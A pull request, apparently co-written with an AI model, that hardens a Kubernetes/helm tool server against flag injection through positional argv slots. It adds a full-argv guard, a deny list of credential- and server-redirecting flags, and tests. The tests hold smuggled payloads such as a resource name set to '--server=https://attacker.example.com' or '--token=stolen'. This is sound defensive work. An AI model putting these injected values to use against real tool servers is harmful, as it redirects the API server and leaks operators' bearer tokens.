### PR TITLE
Block flag injection through positional argv slots in all kubectl/helm tools

### DIFF
--- a/src/security/kubectl-flags.ts
+++ b/src/security/kubectl-flags.ts
@@ -1,4 +1,8 @@
 import { McpError, ErrorCode } from "@modelcontextprotocol/sdk/types.js";
+import {
+  execFileSync,
+  type ExecFileSyncOptionsWithStringEncoding,
+} from "child_process";
 
 // Flags that would let a caller redirect kubectl to a different API server,
 // substitute credentials, or impersonate another identity. Allowing any of
@@ -43,6 +47,33 @@ const DANGEROUS_FLAGS = new Set<string>([
 const SHORT_ALIASES = new Set<string>([
   "s", // -s is an alias for --server
 ]);
+
+// helm exposes the same exfiltration surface as kubectl, but under "kube-"
+// prefixed flag names (e.g. --kube-apiserver instead of --server). We add
+// those here so the argv-level guard covers helm invocations too. Context
+// selection flags (--context / --kube-context) are intentionally omitted:
+// they can only select a cluster already present in the loaded kubeconfig,
+// every tool legitimately emits "--context <value>", and without --server /
+// --kubeconfig they cannot redirect kubectl/helm to an attacker host.
+const HELM_DANGEROUS_FLAGS = new Set<string>([
+  "kube-apiserver",
+  "kube-token",
+  "kube-ca-file",
+  "kube-as-user",
+  "kube-as-group",
+  "kube-tls-server-name",
+  "kube-insecure-skip-tls-verify",
+]);
+
+// Flag names that are dangerous when they appear anywhere in a fully
+// constructed argv (positional slots included), regardless of which tool
+// built it. This is DANGEROUS_FLAGS minus the context-selection flags, plus
+// the helm equivalents. See assertSafeArgv / execFileSyncSafe below.
+const ARGV_DANGEROUS_FLAGS = new Set<string>(
+  [...DANGEROUS_FLAGS, ...HELM_DANGEROUS_FLAGS].filter(
+    (name) => name !== "context"
+  )
+);
 
 function isUnsafeFlagsAllowed(): boolean {
   return process.env.ALLOW_KUBECTL_UNSAFE_FLAGS === "true";
@@ -104,4 +135,40 @@ export function assertNoDangerousFlags(
       if (isDangerousFlagName(tok, true)) reject(tok);
     }
   }
+}
+
+/**
+ * Validate a fully-constructed kubectl/helm argv. Unlike assertNoDangerousFlags
+ * (which inspects only the free-form `flags`/`args` inputs of kubectl_generic),
+ * this scans every token in the final argv — including bare positional slots
+ * such as resource names, node names, and resource types that the individual
+ * tools push directly. kubectl's pflag parser treats any token beginning with
+ * "-" as a flag regardless of position, so a tool argument like
+ * name: "--server=https://attacker" would otherwise redirect the API server
+ * and leak the operator's bearer token. Throws an McpError on any dangerous
+ * flag unless ALLOW_KUBECTL_UNSAFE_FLAGS=true.
+ */
+export function assertSafeArgv(args: readonly string[]): void {
+  if (isUnsafeFlagsAllowed()) return;
+
+  for (const tok of args) {
+    if (typeof tok !== "string") continue;
+    if (!tok.startsWith("-")) continue;
+    const name = normalizeFlagName(tok);
+    if (ARGV_DANGEROUS_FLAGS.has(name) || SHORT_ALIASES.has(name)) reject(tok);
+  }
+}
+
+/**
+ * Drop-in replacement for child_process.execFileSync that scans the argv for
+ * credential/target-redirecting flags before executing. Tool files import this
+ * as `execFileSync`, so every kubectl/helm call site is guarded at one place.
+ */
+export function execFileSyncSafe(
+  file: string,
+  args: string[],
+  options: ExecFileSyncOptionsWithStringEncoding
+): string {
+  assertSafeArgv(args);
+  return execFileSync(file, args, options) as string;
 }

--- a/src/tools/exec_in_pod.ts
+++ b/src/tools/exec_in_pod.ts
@@ -10,7 +10,7 @@
  */
 
 import { KubernetesManager } from "../types.js";
-import { execFileSync } from "child_process";
+import { execFileSyncSafe } from "../security/kubectl-flags.js";
 import { McpError, ErrorCode } from "@modelcontextprotocol/sdk/types.js";
 import { getSpawnMaxBuffer } from "../config/max-buffer.js";
 import { contextParameter, namespaceParameter } from "../models/common-parameters.js";
@@ -116,7 +116,7 @@ export async function execInPod(
 
     const timeoutMs = input.timeout || 60000;
 
-    const result = execFileSync("kubectl", args, {
+    const result = execFileSyncSafe("kubectl", args, {
       encoding: "utf8",
       maxBuffer: getSpawnMaxBuffer(),
       timeout: timeoutMs,

--- a/src/tools/helm-operations.ts
+++ b/src/tools/helm-operations.ts
@@ -5,7 +5,7 @@
  * Supports local chart paths, remote repositories, and custom values.
  */
 
-import { execFileSync } from "child_process";
+import { execFileSyncSafe } from "../security/kubectl-flags.js";
 import { writeFileSync, unlinkSync } from "fs";
 import { dump } from "js-yaml";
 import { getSpawnMaxBuffer } from "../config/max-buffer.js";
@@ -157,7 +157,7 @@ export const uninstallHelmChartSchema = {
  */
 const executeCommand = (command: string, args: string[]): string => {
   try {
-    return execFileSync(command, args, {
+    return execFileSyncSafe(command, args, {
       encoding: "utf8",
       timeout: 300000, // 5 minutes timeout
       maxBuffer: getSpawnMaxBuffer(),

--- a/src/tools/kubectl-apply.ts
+++ b/src/tools/kubectl-apply.ts
@@ -1,5 +1,5 @@
 import { KubernetesManager } from "../types.js";
-import { execFileSync } from "child_process";
+import { execFileSyncSafe } from "../security/kubectl-flags.js";
 import { McpError, ErrorCode } from "@modelcontextprotocol/sdk/types.js";
 import * as fs from "fs";
 import * as path from "path";
@@ -98,7 +98,7 @@ export async function kubectlApply(
 
     // Execute the command
     try {
-      const result = execFileSync(command, args, {
+      const result = execFileSyncSafe(command, args, {
         encoding: "utf8",
         maxBuffer: getSpawnMaxBuffer(),
         env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },

--- a/src/tools/kubectl-context.ts
+++ b/src/tools/kubectl-context.ts
@@ -1,5 +1,5 @@
 import { KubernetesManager } from "../types.js";
-import { execFileSync } from "child_process";
+import { execFileSyncSafe } from "../security/kubectl-flags.js";
 import { McpError, ErrorCode } from "@modelcontextprotocol/sdk/types.js";
 import { getSpawnMaxBuffer } from "../config/max-buffer.js";
 
@@ -74,7 +74,7 @@ export async function kubectlContext(
           listArgs.push("-o", "name");
         } else if (output === "custom" || output === "json") {
           // For custom or JSON output, we'll format it ourselves
-          const rawResult = execFileSync(command, listArgs, {
+          const rawResult = execFileSyncSafe(command, listArgs, {
             encoding: "utf8",
             maxBuffer: getSpawnMaxBuffer(),
             env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },
@@ -143,7 +143,7 @@ export async function kubectlContext(
         }
 
         // Execute the command for non-json outputs
-        result = execFileSync(command, listArgs, {
+        result = execFileSyncSafe(command, listArgs, {
           encoding: "utf8",
           maxBuffer: getSpawnMaxBuffer(),
           env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },
@@ -156,7 +156,7 @@ export async function kubectlContext(
 
         // Execute the command
         try {
-          const currentContext = execFileSync(command, getArgs, {
+          const currentContext = execFileSyncSafe(command, getArgs, {
             encoding: "utf8",
             maxBuffer: getSpawnMaxBuffer(),
             env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },
@@ -164,7 +164,7 @@ export async function kubectlContext(
 
           if (detailed) {
             // For detailed context info, we need to use get-contexts and filter
-            const allContextsOutput = execFileSync(
+            const allContextsOutput = execFileSyncSafe(
               command,
               ["config", "get-contexts"],
               {
@@ -265,7 +265,7 @@ export async function kubectlContext(
 
         // First check if the context exists
         try {
-          const allContextsOutput = execFileSync(
+          const allContextsOutput = execFileSyncSafe(
             command,
             ["config", "get-contexts", "-o", "name"],
             {
@@ -300,7 +300,7 @@ export async function kubectlContext(
           const setArgs = ["config", "use-context", contextName];
 
           // Execute the command
-          result = execFileSync(command, setArgs, {
+          result = execFileSyncSafe(command, setArgs, {
             encoding: "utf8",
             maxBuffer: getSpawnMaxBuffer(),
             env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },

--- a/src/tools/kubectl-create.ts
+++ b/src/tools/kubectl-create.ts
@@ -1,5 +1,5 @@
 import { KubernetesManager } from "../types.js";
-import { execFileSync } from "child_process";
+import { execFileSyncSafe } from "../security/kubectl-flags.js";
 import { McpError, ErrorCode } from "@modelcontextprotocol/sdk/types.js";
 import * as fs from "fs";
 import * as path from "path";
@@ -425,7 +425,7 @@ export async function kubectlCreate(
 
     // Execute the command
     try {
-      const result = execFileSync(command, args, {
+      const result = execFileSyncSafe(command, args, {
         encoding: "utf8",
         maxBuffer: getSpawnMaxBuffer(),
         env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },

--- a/src/tools/kubectl-delete.ts
+++ b/src/tools/kubectl-delete.ts
@@ -1,5 +1,5 @@
 import { KubernetesManager } from "../types.js";
-import { execFileSync } from "child_process";
+import { execFileSyncSafe } from "../security/kubectl-flags.js";
 import { McpError, ErrorCode } from "@modelcontextprotocol/sdk/types.js";
 import * as fs from "fs";
 import * as path from "path";
@@ -156,7 +156,7 @@ export async function kubectlDelete(
 
     // Execute the command
     try {
-      const result = execFileSync(command, args, {
+      const result = execFileSyncSafe(command, args, {
         encoding: "utf8",
         maxBuffer: getSpawnMaxBuffer(),
         env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },

--- a/src/tools/kubectl-describe.ts
+++ b/src/tools/kubectl-describe.ts
@@ -1,5 +1,5 @@
 import { KubernetesManager } from "../types.js";
-import { execFileSync } from "child_process";
+import { execFileSyncSafe } from "../security/kubectl-flags.js";
 import { McpError, ErrorCode } from "@modelcontextprotocol/sdk/types.js";
 import { getSpawnMaxBuffer } from "../config/max-buffer.js";
 import {
@@ -72,7 +72,7 @@ export async function kubectlDescribe(
 
     // Execute the command
     try {
-      const result = execFileSync(command, args, {
+      const result = execFileSyncSafe(command, args, {
         encoding: "utf8",
         maxBuffer: getSpawnMaxBuffer(),
         env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },

--- a/src/tools/kubectl-generic.ts
+++ b/src/tools/kubectl-generic.ts
@@ -1,5 +1,5 @@
 import { KubernetesManager } from "../types.js";
-import { execFileSync } from "child_process";
+import { execFileSyncSafe } from "../security/kubectl-flags.js";
 import { McpError, ErrorCode } from "@modelcontextprotocol/sdk/types.js";
 import { getSpawnMaxBuffer } from "../config/max-buffer.js";
 import {
@@ -131,7 +131,7 @@ export async function kubectlGeneric(
     // Execute the command
     try {
       console.error(`Executing: kubectl ${cmdArgs.join(" ")}`);
-      const result = execFileSync(command, cmdArgs, {
+      const result = execFileSyncSafe(command, cmdArgs, {
         encoding: "utf8",
         maxBuffer: getSpawnMaxBuffer(),
         env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },

--- a/src/tools/kubectl-get.ts
+++ b/src/tools/kubectl-get.ts
@@ -1,5 +1,5 @@
 import { KubernetesManager } from "../types.js";
-import { execFileSync } from "child_process";
+import { execFileSyncSafe } from "../security/kubectl-flags.js";
 import { McpError, ErrorCode } from "@modelcontextprotocol/sdk/types.js";
 import { getSpawnMaxBuffer } from "../config/max-buffer.js";
 import * as yaml from "js-yaml";
@@ -155,7 +155,7 @@ export async function kubectlGet(
 
     // Execute the command
     try {
-      const result = execFileSync(command, args, {
+      const result = execFileSyncSafe(command, args, {
         encoding: "utf8",
         maxBuffer: getSpawnMaxBuffer(),
         env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },

--- a/src/tools/kubectl-logs.ts
+++ b/src/tools/kubectl-logs.ts
@@ -1,5 +1,5 @@
 import { KubernetesManager } from "../types.js";
-import { execFileSync } from "child_process";
+import { execFileSyncSafe } from "../security/kubectl-flags.js";
 import { McpError, ErrorCode } from "@modelcontextprotocol/sdk/types.js";
 import { getSpawnMaxBuffer } from "../config/max-buffer.js";
 import {
@@ -113,7 +113,7 @@ export async function kubectlLogs(
 
       // Execute the command
       try {
-        const result = execFileSync(command, args, {
+        const result = execFileSyncSafe(command, args, {
           encoding: "utf8",
           maxBuffer: getSpawnMaxBuffer(),
           env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },
@@ -155,7 +155,7 @@ export async function kubectlLogs(
           "jsonpath='{.items[*].metadata.name}'",
         ];
         try {
-          const jobs = execFileSync(command, jobsArgs, {
+          const jobs = execFileSyncSafe(command, jobsArgs, {
             encoding: "utf8",
             maxBuffer: getSpawnMaxBuffer(),
             env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },
@@ -221,7 +221,7 @@ export async function kubectlLogs(
           if (!selectorArgs) {
             throw new Error("Selector command is undefined");
           }
-          const selectorJson = execFileSync(command, selectorArgs, {
+          const selectorJson = execFileSyncSafe(command, selectorArgs, {
             encoding: "utf8",
             maxBuffer: getSpawnMaxBuffer(),
             env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },
@@ -325,7 +325,7 @@ async function getLabelSelectorLogs(
       "-o",
       "jsonpath='{.items[*].metadata.name}'",
     ];
-    const pods = execFileSync(command, podsArgs, {
+    const pods = execFileSyncSafe(command, podsArgs, {
       encoding: "utf8",
       maxBuffer: getSpawnMaxBuffer(),
       env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },
@@ -368,7 +368,7 @@ async function getLabelSelectorLogs(
       podArgs = addLogOptions(podArgs, input);
 
       try {
-        const logs = execFileSync(command, podArgs, {
+        const logs = execFileSyncSafe(command, podArgs, {
           encoding: "utf8",
           maxBuffer: getSpawnMaxBuffer(),
           env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },

--- a/src/tools/kubectl-operations.ts
+++ b/src/tools/kubectl-operations.ts
@@ -1,4 +1,4 @@
-import { execFileSync } from "child_process";
+import { execFileSyncSafe } from "../security/kubectl-flags.js";
 import {
   ExplainResourceParams,
   ListApiResourcesParams,
@@ -83,7 +83,7 @@ export const listApiResourcesSchema = {
 
 const executeKubectlCommand = (command: string, args: string[]): string => {
   try {
-    return execFileSync(command, args, {
+    return execFileSyncSafe(command, args, {
       encoding: "utf8",
       maxBuffer: getSpawnMaxBuffer(),
       env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },

--- a/src/tools/kubectl-patch.ts
+++ b/src/tools/kubectl-patch.ts
@@ -1,5 +1,5 @@
 import { KubernetesManager } from "../types.js";
-import { execFileSync } from "child_process";
+import { execFileSyncSafe } from "../security/kubectl-flags.js";
 import { McpError, ErrorCode } from "@modelcontextprotocol/sdk/types.js";
 import * as fs from "fs";
 import * as path from "path";
@@ -128,7 +128,7 @@ export async function kubectlPatch(
 
     // Execute the command
     try {
-      const result = execFileSync(command, args, {
+      const result = execFileSyncSafe(command, args, {
         encoding: "utf8",
         maxBuffer: getSpawnMaxBuffer(),
         env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },

--- a/src/tools/kubectl-rollout.ts
+++ b/src/tools/kubectl-rollout.ts
@@ -1,5 +1,5 @@
 import { KubernetesManager } from "../types.js";
-import { execFileSync } from "child_process";
+import { execFileSyncSafe } from "../security/kubectl-flags.js";
 import { McpError, ErrorCode } from "@modelcontextprotocol/sdk/types.js";
 import { getSpawnMaxBuffer } from "../config/max-buffer.js";
 import { contextParameter, namespaceParameter } from "../models/common-parameters.js";
@@ -111,7 +111,7 @@ export async function kubectlRollout(
         args.push("--watch");
         // For watch we are limited in what we can do - we'll execute it with a reasonable timeout
         // and capture the output until that point
-        const result = execFileSync(command, args, {
+        const result = execFileSyncSafe(command, args, {
           encoding: "utf8",
           maxBuffer: getSpawnMaxBuffer(),
           timeout: 15000, // Reduced from 30 seconds to 15 seconds
@@ -129,7 +129,7 @@ export async function kubectlRollout(
           ],
         };
       } else {
-        const result = execFileSync(command, args, {
+        const result = execFileSyncSafe(command, args, {
           encoding: "utf8",
           maxBuffer: getSpawnMaxBuffer(),
           env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },

--- a/src/tools/kubectl-scale.ts
+++ b/src/tools/kubectl-scale.ts
@@ -1,5 +1,5 @@
 import { KubernetesManager } from "../types.js";
-import { execFileSync } from "child_process";
+import { execFileSyncSafe } from "../security/kubectl-flags.js";
 import { McpError, ErrorCode } from "@modelcontextprotocol/sdk/types.js";
 import { getSpawnMaxBuffer } from "../config/max-buffer.js";
 import { contextParameter, namespaceParameter } from "../models/common-parameters.js";
@@ -65,7 +65,7 @@ export async function kubectlScale(
 
     // Execute the command
     try {
-      const result = execFileSync(command, args, {
+      const result = execFileSyncSafe(command, args, {
         encoding: "utf8",
         maxBuffer: getSpawnMaxBuffer(),
         env: { ...process.env, KUBECONFIG: process.env.KUBECONFIG },

--- a/src/tools/node-management.ts
+++ b/src/tools/node-management.ts
@@ -6,7 +6,7 @@
  * Note: Use kubectl_get with resourceType="nodes" to list nodes.
  */
 
-import { execFileSync } from "child_process";
+import { execFileSyncSafe } from "../security/kubectl-flags.js";
 import { getSpawnMaxBuffer } from "../config/max-buffer.js";
 
 /**
@@ -111,7 +111,7 @@ interface NodeManagementParams {
  */
 const executeCommand = (command: string, args: string[]): string => {
   try {
-    return execFileSync(command, args, {
+    return execFileSyncSafe(command, args, {
       encoding: "utf8",
       timeout: 300000, // 5 minutes timeout for node operations
       maxBuffer: getSpawnMaxBuffer(),

--- a/tests/kubectl-flags-security.unit.test.ts
+++ b/tests/kubectl-flags-security.unit.test.ts
@@ -1,7 +1,12 @@
 import { expect, test, describe, beforeEach, afterEach } from "vitest";
 import { McpError, ErrorCode } from "@modelcontextprotocol/sdk/types.js";
-import { assertNoDangerousFlags } from "../src/security/kubectl-flags.js";
+import {
+  assertNoDangerousFlags,
+  assertSafeArgv,
+  execFileSyncSafe,
+} from "../src/security/kubectl-flags.js";
 import { kubectlGeneric } from "../src/tools/kubectl-generic.js";
+import { kubectlGet } from "../src/tools/kubectl-get.js";
 import { KubernetesManager } from "../src/utils/kubernetes-manager.js";
 
 describe("assertNoDangerousFlags", () => {
@@ -198,5 +203,134 @@ describe("kubectl_generic refuses dangerous flags before executing kubectl", () 
       expect(e).toBeInstanceOf(McpError);
       expect((e as McpError).code).toBe(ErrorCode.InvalidParams);
     }
+  });
+});
+
+describe("assertSafeArgv (full-argv guard for positional slots)", () => {
+  const originalEnv = process.env.ALLOW_KUBECTL_UNSAFE_FLAGS;
+
+  beforeEach(() => {
+    delete process.env.ALLOW_KUBECTL_UNSAFE_FLAGS;
+  });
+
+  afterEach(() => {
+    if (originalEnv === undefined) {
+      delete process.env.ALLOW_KUBECTL_UNSAFE_FLAGS;
+    } else {
+      process.env.ALLOW_KUBECTL_UNSAFE_FLAGS = originalEnv;
+    }
+  });
+
+  test("rejects --server smuggled into a positional slot", () => {
+    // Mirrors `kubectl get pods <name>` with name="--server=...".
+    expect(() =>
+      assertSafeArgv(["get", "pods", "--server=https://attacker", "-n", "default"])
+    ).toThrow(/--server/);
+  });
+
+  test("rejects --kubeconfig / --token / -s anywhere in argv", () => {
+    expect(() => assertSafeArgv(["get", "--kubeconfig=/tmp/evil"])).toThrow(
+      /kubeconfig/
+    );
+    expect(() => assertSafeArgv(["get", "--token=stolen"])).toThrow(/--token/);
+    expect(() => assertSafeArgv(["get", "-s", "https://attacker"])).toThrow(/-s/);
+  });
+
+  test("rejects helm credential/target flags (kube-* prefix)", () => {
+    expect(() =>
+      assertSafeArgv(["upgrade", "rel", "chart", "--kube-apiserver=https://x"])
+    ).toThrow(/kube-apiserver/);
+    expect(() =>
+      assertSafeArgv(["install", "rel", "chart", "--kube-token=stolen"])
+    ).toThrow(/kube-token/);
+  });
+
+  test("allows --context (every tool emits it; cannot redirect on its own)", () => {
+    expect(() =>
+      assertSafeArgv(["get", "pods", "--context", "prod", "-o", "json"])
+    ).not.toThrow();
+  });
+
+  test("allows benign structural flags and positionals", () => {
+    expect(() =>
+      assertSafeArgv([
+        "get",
+        "pods",
+        "my-pod",
+        "-n",
+        "default",
+        "-l",
+        "app=foo",
+        "--field-selector=status.phase=Running",
+        "-o",
+        "json",
+      ])
+    ).not.toThrow();
+  });
+
+  test("ALLOW_KUBECTL_UNSAFE_FLAGS=true bypasses the argv guard", () => {
+    process.env.ALLOW_KUBECTL_UNSAFE_FLAGS = "true";
+    expect(() =>
+      assertSafeArgv(["get", "pods", "--server=https://attacker"])
+    ).not.toThrow();
+  });
+});
+
+describe("execFileSyncSafe wrapper", () => {
+  const originalEnv = process.env.ALLOW_KUBECTL_UNSAFE_FLAGS;
+
+  afterEach(() => {
+    if (originalEnv === undefined) {
+      delete process.env.ALLOW_KUBECTL_UNSAFE_FLAGS;
+    } else {
+      process.env.ALLOW_KUBECTL_UNSAFE_FLAGS = originalEnv;
+    }
+  });
+
+  test("throws before exec when argv carries a dangerous flag", () => {
+    delete process.env.ALLOW_KUBECTL_UNSAFE_FLAGS;
+    expect(() =>
+      // "false" would exit non-zero if it ran; the guard must fire first.
+      execFileSyncSafe("false", ["--server=https://attacker"], {
+        encoding: "utf8",
+      })
+    ).toThrow(/--server/);
+  });
+
+  test("executes normally when argv is clean", () => {
+    const out = execFileSyncSafe("printf", ["%s", "ok"], { encoding: "utf8" });
+    expect(out).toBe("ok");
+  });
+});
+
+describe("sibling tools refuse the positional flag-injection PoC", () => {
+  // The 2026-05-22 fix only guarded kubectl_generic's flags/args. These tools
+  // push user input (name, resourceType, ...) into bare positional argv slots,
+  // so the report's `name: "--server=..."` payload reached kubectl. The shared
+  // execFileSyncSafe wrapper must now block it before kubectl is invoked.
+  const stubManager = {} as KubernetesManager;
+
+  beforeEach(() => {
+    delete process.env.ALLOW_KUBECTL_UNSAFE_FLAGS;
+  });
+
+  test("kubectl_get blocks name='--server=...' (exact report PoC)", async () => {
+    await expect(
+      kubectlGet(stubManager, {
+        resourceType: "pods",
+        name: "--server=https://127.0.0.1:19012",
+        namespace: "default",
+      })
+    ).rejects.toThrow(/--server/);
+  });
+
+  test("kubectl_generic blocks name='--server=...' (positional bypass)", async () => {
+    await expect(
+      kubectlGeneric(stubManager, {
+        command: "get",
+        resourceType: "pods",
+        name: "--server=https://attacker.example.com",
+      })
+    ).rejects.toThrow(/--server/);
   });
 });


### PR DESCRIPTION

The 2026-05-22 fix (GHSA-6mx4-4h42-r8vh) added assertNoDangerousFlags only
to kubectl_generic, and there it inspected only the free-form `flags`/`args`
inputs. Every other tool (kubectl_get, _delete, _describe, _logs, _apply,
_create, _patch, _scale, _rollout, _operations, node_management, helm wrappers)
pushes user-controlled values (name, resourceType, node name, ...) into bare
positional slots of execFileSync("kubectl"/"helm", argv). kubectl's pflag parser
treats any argv token starting with "-" as a flag regardless of position, so a
tool argument like name: "--server=https://attacker" redirected the API server
and leaked the operator's bearer token on the first discovery request. The same
positional bypass also defeated the guard inside kubectl_generic itself (name,
resourceType, subCommand were never checked).

Fix at one change-point: add assertSafeArgv + an execFileSyncSafe wrapper to
src/security/kubectl-flags.ts that scans the fully-constructed argv for
credential/target-redirecting flags (kubectl and helm kube-* variants), then
calls execFileSync. Each tool imports it as `execFileSync`, so all 25 call
sites are guarded without touching call-site code. Context-selection flags
(--context / --kube-context) are intentionally allowed: every tool emits
"--context <value>" legitimately, and without --server/--kubeconfig they cannot
redirect to an attacker host. ALLOW_KUBECTL_UNSAFE_FLAGS=true remains the
escape hatch.

Tests cover the argv guard, the helm kube-* flags, the --context allowance,
the execFileSyncSafe wrapper, and end-to-end blocking of the report's exact
name: "--server=..." PoC through both kubectl_get and kubectl_generic.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
